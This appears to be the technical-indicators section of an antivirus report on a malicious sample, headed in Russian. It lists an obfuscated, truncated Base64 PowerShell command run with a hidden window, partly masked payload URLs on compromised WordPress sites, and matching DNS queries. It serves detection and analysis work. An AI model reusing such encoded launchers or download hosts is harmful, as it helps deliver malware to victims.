Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1190755.cvr
- http://tu###invest.com/wp-admin/rGtnUb5f/
- http://dp####enbasket.com/wp-admin/Li/
- http://www.dp####enbasket.com/wp-admin/Li/
- http://st##efix.co/guillotine-cross/CTRNOQ/
- http://bo#####ovation.co.za/wp-content/2ssHvi/
- http://no##dco.es/wp-admin/MvwVHCG/
- DNS ASK tu###invest.com
- DNS ASK dp####enbasket.com
- DNS ASK st##efix.co
- DNS ASK ar###.com.br
- DNS ASK dr######lplasticsurgery.com
- DNS ASK bo#####ovation.co.za
- DNS ASK no##dco.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0ASQBUAEUATQAgAHYAYQByAGkAQQBCAEwAZQA6AGsAegBlAFEAbABVACAAIAAoAFsAdABZAFAAZQBdACgAJwBzAFkAJwArACcAcwBUAEUAbQAnACsAJwAuAGkAJwArACcAbwAuAGQASQByAEUAQwB0AE8AUg...' (со скрытым окном)